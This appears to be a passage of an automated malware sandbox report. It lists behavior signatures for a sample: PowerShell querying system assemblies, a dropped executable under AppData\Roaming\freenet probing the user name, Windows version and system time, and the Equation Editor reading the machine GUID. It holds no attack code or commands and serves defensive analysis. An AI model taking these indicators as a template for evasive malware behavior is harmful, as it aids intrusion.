Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeQueries volume information: C:\ VolumeInformationJump to behavior
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001E71D1 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,18_2_001E71D1
Contains functionality to query the account / user nameShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001E4380 GetUserNameW,18_2_001E4380
Contains functionality to query windows versionShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001EEDA0 GetVersion,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,18_2_001EEDA0
Queries the cryptographic machine GUIDShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET